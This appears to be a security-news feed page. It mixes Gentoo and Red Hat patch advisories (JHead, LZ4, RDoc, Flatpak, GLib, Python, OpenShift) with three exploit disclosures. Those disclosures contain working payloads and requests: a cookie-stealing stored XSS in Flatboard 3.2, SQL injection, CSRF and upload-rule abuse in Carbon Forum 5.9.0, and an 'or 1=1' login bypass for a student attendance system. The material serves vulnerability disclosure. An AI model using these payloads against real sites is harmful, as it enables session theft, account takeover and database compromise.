Gentoo Linux Security Advisory 202406-5 - Multiple vulnerabilities have been discovered in JHead, the worst of which may lead to arbitrary code execution. Versions greater than or equal to 3.08 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: JHead: Multiple Vulnerabilities  
     Date: June 22, 2024  
     Bugs: #876247, #879801, #908519  
       ID: 202406-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in JHead, the worst of  
which may lead to arbitrary code execution.

Background  
==========

JHead is an EXIF JPEG header manipulation tool.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
media-gfx/jhead  < 3.08        >= 3.08

Description  
===========

Multiple vulnerabilities have been discovered in JHead. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All JHead users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/jhead-3.08"

References  
==========

[ 1 ] CVE-2020-6624  
      https://nvd.nist.gov/vuln/detail/CVE-2020-6624  
[ 2 ] CVE-2020-6625  
      https://nvd.nist.gov/vuln/detail/CVE-2020-6625  
[ 3 ] CVE-2021-34055  
      https://nvd.nist.gov/vuln/detail/CVE-2021-34055  
[ 4 ] CVE-2022-28550  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28550  
[ 5 ] CVE-2022-41751  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41751

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-05

Gentoo Linux Security Advisory 202406-4 - A vulnerability has been discovered in LZ4, which can lead to memory corruption. Versions greater than or equal to 1.9.3-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: LZ4: Memory Corruption  
     Date: June 22, 2024  
     Bugs: #791952  
       ID: 202406-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in LZ4, which can lead to memory  
corruption.

Background  
==========

LZ4 is a lossless compression algorithm, providing compression speed >  
500 MB/s per core, scalable with multi-cores CPU. It features an  
extremely fast decoder, with speed in multiple GB/s per core, typically  
reaching RAM speed limits on multi-core systems.

Affected packages  
=================

Package       Vulnerable    Unaffected  
------------  ------------  ------------  
app-arch/lz4  < 1.9.3-r1    >= 1.9.3-r1

Description  
===========

An attacker who submits a crafted file to an application linked with lz4  
may be able to trigger an integer overflow, leading to calling of  
memmove() on a negative size argument, causing an out-of-bounds write  
and/or a crash.

Impact  
======

The greatest impact of this flaw is to availability, with some potential  
impact to confidentiality and integrity as well.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All LZ4 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-arch/lz4-1.9.3-r1"

References  
==========

[ 1 ] CVE-2021-3520  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3520

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-04

Flatboard version 3.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Flatboard v3.2  - Stored XSS# Date: 2024-06-23# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://flatboard.org/# Version: 3.2----------------------------------------------------------------------------------------------------1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum2-Click Add Forum and write in  Information field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>3-Save it , you will be see alert button

Flatboard 3.2 Cross Site Scripting

Gentoo Linux Security Advisory 202406-3 - A vulnerability has been discovered in RDoc, which can lead to execution of arbitrary code. Versions greater than or equal to 6.6.3.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: RDoc: Remote Code Cxecution  
     Date: June 22, 2024  
     Bugs: #927565  
       ID: 202406-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in RDoc, which can lead to execution  
of arbitrary code.

Background  
==========

RDoc produces HTML and command-line documentation for Ruby projects.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-ruby/rdoc  < 6.6.3.1     >= 6.6.3.1

Description  
===========

A vulnerability has been discovered in RDoc. Please review the CVE  
identifier referenced below for details.

Impact  
======

When parsing .rdoc_options (used for configuration in RDoc) as a YAML  
file, object injection and resultant remote code execution are possible  
because there are no restrictions on the classes that can be restored.

When loading the documentation cache, object injection and resultant  
remote code execution are also possible if there were a crafted cache.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All RDoc users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-ruby/rdoc-6.6.3.1"

References  
==========

[ 1 ] CVE-2024-27281  
      https://nvd.nist.gov/vuln/detail/CVE-2024-27281

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-03

Carbon Forum version 5.9.0 suffers from access control, cross site request forgery, file upload, outdated library, and remote SQL injection vulnerabilities.

    {-} Title => Carbon Forum 5.9.0 - Multiple Exploits{-} Author => bRpsd [cy@Live.no]{-} Date Release => 22 June, 2024{-} Vendor => Carbon Forum <= 5.9.0    Homepage => https://www.94cb.com/  Download => https://github.com/lincanbin/Carbon-Forum  Vulnerable Versions => 5.9.0 >=  Tested Version => 5.9.0 on xampp Server.#######################################################################################Vulnerability #1 : Reset Administrator Password & Database settingsFile Path: http://localhost/Carbon-Forum/install/INFO: The install folder remains after installation which allows attackers to recreate a new DB and have an admin account by default through registering the first user##############################################################################################################################################################################Vulnerability #2 : SQL InjectionVulnerable Code: /Carbon-Forum/install/index.phpif ($_SERVER['REQUEST_METHOD'] == 'POST') {  $fp = fopen(__DIR__ . '/database.sql', "r") or die("SQL文件无法打开。  The SQL File could not be opened.");  //dobefore  if (isset($_POST["Language"]) && isset($_POST["DBHost"]) && isset($_POST["DBName"]) && isset($_POST["DBUser"]) && isset($_POST["DBPassword"])) {    $Language = $_POST['Language'];    $DBHost = $_POST['DBHost'];    $DBName = $_POST['DBName'];    $DBUser = $_POST['DBUser'];    $DBPassword = $_POST['DBPassword'];    $SearchServer = $_POST['SearchServer'];    $SearchPort = $_POST['SearchPort'];    $EnableMemcache = $_POST['EnableMemcache'];    $MemCachePrefix = $_POST['MemCachePrefix'];  } else {    die("An Unexpected Error Occured!");  }  //$WebsitePath = $_POST['WebsitePath'];  $WebsitePath = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];  if (preg_match('/(.*)\/install/i', $WebsitePath, $WebsitePathMatch)) {    $WebsitePath = $WebsitePathMatch[1];  } else {    $WebsitePath = '';  }  //初始化数据库操作类  require('../library/PDO.class.php');  $DB = new Db($DBHost, 3306, '', $DBUser, $DBPassword);  $DatabaseExist = $DB->single("SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = :DBName", array('DBName' => $DBName));  if (empty($DatabaseExist)) {    $DB->query("CREATE DATABASE IF NOT EXISTS " . $DBName . ";");  }    POC Request:POST http://localhost/Carbon-Forum/install/?Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencodedContent-Length: 173Origin: http://localhostConnection: keep-aliveReferer: http://localhost/Carbon-Forum/install/Cookie: CarbonBBS_View=desktop; CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; PHPSESSID=addf2aa242dcb91d00faf41e6d6b07b3Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Language=en&DBHost=localhost&DBName=&DBUser=test'&DBPassword=&SearchServer=&SearchPort=&EnableMemcache=false&MemCachePrefix=carbon_&submit=安 装 / InstallResponse:SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1You can find the error back in the log.#######################################################################################################################################################################################################Vulnerability #3 : CSRF - Change users email File Path: http://localhost/Carbon-Forum/settingsMethod: POSTParameter : UserMailCode:Carbon-Forum/controller/settings.phpPOC:    case 'UpdateUserInfo':      $CurUserInfo['UserSex']      = intval(Request('POST', 'UserSex', 0));      $CurUserInfo['UserMail']     = IsEmail(Request('POST', 'UserMail', $CurUserInfo['UserMail'])) ? Request('POST', 'UserMail', $CurUserInfo['UserMail']) : $CurUserInfo['UserMail'];      $CurUserInfo['UserHomepage'] = CharCV(Request('POST', 'UserHomepage', $CurUserInfo['UserHomepage']));      $CurUserInfo['UserIntro']    = CharCV(Request('POST', 'UserIntro', $CurUserInfo['UserIntro']));      $UpdateUserInfoResult        = UpdateUserInfo(array(        'UserSex' => $CurUserInfo['UserSex'],        'UserMail' => $CurUserInfo['UserMail'],        'UserHomepage' => $CurUserInfo['UserHomepage'],        'UserIntro' => $CurUserInfo['UserIntro']      ));      if ($UpdateUserInfoResult) {        $UpdateUserInfoMessage = $Lang['Profile_Modified_Successfully'];<form method='POST' action='http://localhost/Carbon-Forum/settings'>        <input type="hidden" name="Action" value="UpdateUserInfo">        <input type="hidden" name="UserSex" value="0">        <input type="hidden" name="UserMail" value="changed@new-email.com">        <input type="hidden" name="UserHomepage" value="">        <input type="hidden" name="UserIntro" value="">      <input type='submit' value='submit'>    </form>    #######################################################################################################################################################################################################Vulnerability #4 : Arbitrary File Upload - RCE [Authenticated]Info: Administrator can change allowed files in dashboard -> parameterPOC POST:http://localhost/Carbon-Forum/dashboard#dashboard4Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencodedContent-Length: 14662Origin: http://localhostConnection: keep-aliveReferer: http://localhost/Carbon-Forum/dashboardCookie: CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; CarbonBBS_View=desktopUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Action=Parameter&UploadParameters=/* 前后端通信相关的配置,注释只允许使用多行方式 */ { /* 上传图片配置项 */ "imageActionName": "uploadimage", /* 执行上传图片的action名称 */ "imageFieldName": "upfile", /* 提交的图片表单名称 */ "imageMaxSize": 4096000, /* 上传大小限制，单位B */ "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 上传图片格式显示 */ "imageCompressEnable": true, /* 是否压缩图片,默认是true */ "imageCompressBorder": 1600, /* 图片压缩最长边限制 */ "imageInsertAlign": "none", /* 插入的图片浮动方式 */ "imageUrlPrefix": "", /* 图片访问路径前缀 */ "imagePathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ /* {filename} 会替换成原文件名,配置这项需要注意中文乱码问题 */ /* {rand:6} 会替换成随机数,后面的数字是随机数的位数 */ /* {time} 会替换成时间戳 */ /* {yyyy} 会替换成四位年份 */ /* {yy} 会替换成两位年份 */ /* {mm} 会替换成两位月份 */ /* {dd} 会替换成两位日期 */ /* {hh} 会替换成两位小时 */ /* {ii} 会替换成两位分钟 */ /* {ss} 会替换成两位秒 */ /* 非法字符 \ : * ? " < > | */ /* 具请体看线上文档: fex.baidu.com/ueditor/#use-format_upload_filename */ /* 涂鸦图片上传配置项 */ "scrawlActionName": "uploadscrawl", /* 执行上传涂鸦的action名称 */ "scrawlFieldName": "upfile", /* 提交的图片表单名称 */ "scrawlPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "scrawlMaxSize": 2048000, /* 上传大小限制，单位B */ "scrawlUrlPrefix": "", /* 图片访问路径前缀 */ "scrawlInsertAlign": "none", "scrawlAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 截图工具上传 */ "snapscreenActionName": "uploadimage", /* 执行上传截图的action名称 */ "snapscreenPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "snapscreenUrlPrefix": "", /* 图片访问路径前缀 */ "snapscreenInsertAlign": "none", /* 插入的图片浮动方式 */ /* 抓取远程图片配置 */ "catcherLocalDomain": ["127.0.0.1", "localhost", "img.baidu.com"], "catcherActionName": "catchimage", /* 执行抓取远程图片的action名称 */ "catcherFieldName": "source", /* 提交的图片列表表单名称 */ "catcherPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "catcherUrlPrefix": "", /* 图片访问路径前缀 */ "catcherMaxSize": 2048000, /* 上传大小限制，单位B */ "catcherAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 抓取图片格式显示 */ /* 上传视频配置 */ "videoActionName": "uploadvideo", /* 执行上传视频的action名称 */ "videoFieldName": "upfile", /* 提交的视频表单名称 */ "videoPathFormat": "/upload/video/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "videoUrlPrefix": "", /* 视频访问路径前缀 */ "videoMaxSize": 20480000, /* 上传大小限制，单位B，默认20MB */ "videoAllowFiles": [ ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid"], /* 上传视频格式显示 */ /* 上传文件配置 */ "fileActionName": "uploadfile", /* controller里,执行上传视频的action名称 */ "fileFieldName": "upfile", /* 提交的文件表单名称 */ "filePathFormat": "/upload/file/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "fileUrlPrefix": "", /* 文件访问路径前缀 */ "fileMaxSize": 2048000, /* 上传大小限制，单位B，默认2MB */ "fileAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ], /* 上传文件格式显示 */ /* 列出指定目录下的图片 */ "imageManagerActionName": "listimage", /* 执行图片管理的action名称 */ "imageManagerListPath": "/upload/image/", /* 指定要列出图片的目录 */ "imageManagerListSize": 60, /* 每次列出文件数量 */ "imageManagerUrlPrefix": "", /* 图片访问路径前缀 */ "imageManagerInsertAlign": "none", /* 插入的图片浮动方式 */ "imageManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 列出的文件类型 */ /* 列出指定目录下的文件 */ "fileManagerActionName": "listfile", /* 执行文件管理的action名称 */ "fileManagerListPath": "/upload/file/", /* 指定要列出文件的目录 */ "fileManagerUrlPrefix": "", /* 文件访问路径前缀 */ "fileManagerListSize": 60, /* 每次列出文件数量 */ "fileManagerAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ] /* 列出的文件类型 */ }&TextFilterParameter=/* 关键词过滤相关的配置,注释只允许使用多行方式 */ { /* 关键词均支持正则表达式，过多的过滤会影响性能 "fuck" : "f**k", 以上规则表示发表含fuck的内容，会被过滤为f**k "negro" : [false, 30], Don't issue text with "negro", or it will freeze for 30 seconds. "蛤" : [false, 30], 以上规则禁止发布含“蛤”的内容，并且尝试发表该内容的用户会被续(jin)掉(yan)30秒生命 "negro" : ["black", 30], "包子" : ["维尼", 30], 以上规则表示发表含"包子"的内容，会被过滤为"维尼"，并且在内容发表成功后，需要再等30秒才能发言 */ /* "fuck" : "f**k", "negro" : [false, 30], "蛤" : [false, 30], "negro" : ["black", 30], "包子" : ["维尼", 30] */ }&submit=Save settings##############################################################################################################################################################################Vulnerability #4 : Vulnerable PHPMailer libraryFile: /Carbon-Forum/library/PHPMailer.class.phpVersion: $Version = '5.2.16';#######################################################################################

Carbon Forum 5.9.0 Cross Site Request Forgery / SQL Injection

Gentoo Linux Security Advisory 202406-2 - A vulnerability has been discovered in Flatpak, which can lead to a sandbox escape. Versions greater than or equal to 1.14.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Flatpak: Sandbox Escape  
     Date: June 22, 2024  
     Bugs: #930202  
       ID: 202406-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Flatpak, which can lead to a  
sandbox escape.

Background  
==========

Flatpak is a Linux application sandboxing and distribution framework.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
sys-apps/flatpak  < 1.14.6      >= 1.14.6

Description  
===========

A vulnerability has been discovered in Flatpak. Please review the CVE  
identifier referenced below for details.

Impact  
======

A malicious or compromised Flatpak app could execute arbitrary code  
outside its sandbox in conjunction with xdg-desktop-portal.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Flatpak users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/flatpak-1.14.6"

References  
==========

[ 1 ] CVE-2024-32462  
      https://nvd.nist.gov/vuln/detail/CVE-2024-32462

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-02

Gentoo Linux Security Advisory 202406-1 - A vulnerability has been discovered in GLib, which can lead to privilege escalation. Versions greater than or equal to 2.78.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GLib: Privilege Escalation  
     Date: June 22, 2024  
     Bugs: #931507  
       ID: 202406-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in GLib, which can lead to privilege  
escalation.

Background  
==========

GLib is a library providing a number of GNOME's core objects and  
functions.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-libs/glib  < 2.78.6      >= 2.78.6

Description  
===========

A vulnerability has been discovered in GLib. Please review the CVE  
identifier referenced below for details.

Impact  
======

When a GDBus-based client subscribes to signals from a trusted system  
service such as NetworkManager or logind on a shared computer, other  
users of the same computer can send spoofed D-Bus signals that the  
GDBus-based client will wrongly interpret as having been sent by the  
trusted system service. This could lead to the GDBus-based client  
behaving incorrectly, with an application-dependent impact.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All GLib users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/glib-2.78.6"

References  
==========

[ 1 ] CVE-2024-34397  
      https://nvd.nist.gov/vuln/detail/CVE-2024-34397

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-01

Student Attendance Management System version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Titles: Student Attendance Management System-1.0 Bypass AuthenticationSQLi## Author: nu11secur1ty## Date: 06/22/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter is not sanitizing well, the attacker can injectdirect queries into the login form and easily bypass the authentication ofthe admin account.STATUS: CRITICAL- Vulnerability[+]Exploits:- Exploit:```POSTPOST /student_attendance/ajax.php?action=login HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4Content-Length: 104Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"Accept-Language: en-USSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept: */*X-Requested-With: XMLHttpRequestSec-Ch-Ua-Platform: "Windows"Origin: https://pwnedhost.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pwnedhost.com/student_attendance/login.phpAccept-Encoding: gzip, deflate, brPriority: u=1, iConnection: keep-aliveusername=nu11secur1ty'+or+1%3D1%23&password=stupiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiid```[+]Response```HTTPHTTP/1.1 200 OKDate: Sat, 22 Jun 2024 06:37:41 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 1Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-81```## Reproduce:[href](https://www.patreon.com/posts/student-system-1-106665723)## Proof and Exploit:[href](https://www.patreon.com/posts/student-system-1-106665723)## Time spent:01:25:00

Student Attendance Management System 1.0 SQL Injection

Red Hat Security Advisory 2024-4058-03 - An update for python3.11 is now available for Red Hat Enterprise Linux 8. Issues addressed include denial of service and traversal vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4058.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python3.11 security updateAdvisory ID:        RHSA-2024:4058-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4058Issue date:         2024-06-24Revision:           03CVE Names:          CVE-2023-6597====================================================================Summary: An update for python3.11 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: Path traversal on tempfile.TemporaryDirectory (CVE-2023-6597)* python: The zipfile module is vulnerable to zip-bombs leading to denial of service (CVE-2024-0450)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6597References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2276518https://bugzilla.redhat.com/show_bug.cgi?id=2276525

Red Hat Security Advisory 2024-4058-03

Red Hat Security Advisory 2024-4057-03 - Release of OpenShift Serverless Logic 1.33.0. Issues addressed include cross site scripting and denial of service vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4057.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Release of OpenShift Serverless Logic 1.33.0 security update & enhancements  
Advisory ID:        RHSA-2024:4057-03  
Product:            Red Hat OpenShift Serverless  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:4057  
Issue date:         2024-06-24  
Revision:           03  
CVE Names:          CVE-2023-6717  
====================================================================

Summary: 

Release of OpenShift Serverless Logic 1.33.0

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This release includes security, bug fixes, and enhancements.

Security Fix(es):

* keycloak: org.keycloak.protocol.oidc: unvalidated cross-origin messages in checkLoginIframe leads to DDoS (CVE-2024-1249)

* keycloak: XSS via assertion consumer service URL in SAML POST-binding flow (CVE-2023-6717)

* pgjdbc: PostgreSQL JDBC Driver allows attacker to inject SQL if using PreferQueryMode=SIMPLE (CVE-2024-1597)

* camel-core: Exposure of sensitive data by crafting a malicious EventFactory (CVE-2024-22371)

* commons-compress: Denial of service caused by an infinite loop for a corrupted DUMP file (CVE-2024-25710)

* commons-compress: OutOfMemoryError unpacking broken Pack200 file (CVE-2024-26308)

* jose4j: denial of service via specially crafted JWE (CVE-2023-51775)

For more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.

Solution:

https://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.33

CVEs:

CVE-2023-6717

References:

https://access.redhat.com/security/updates/classification/#important  
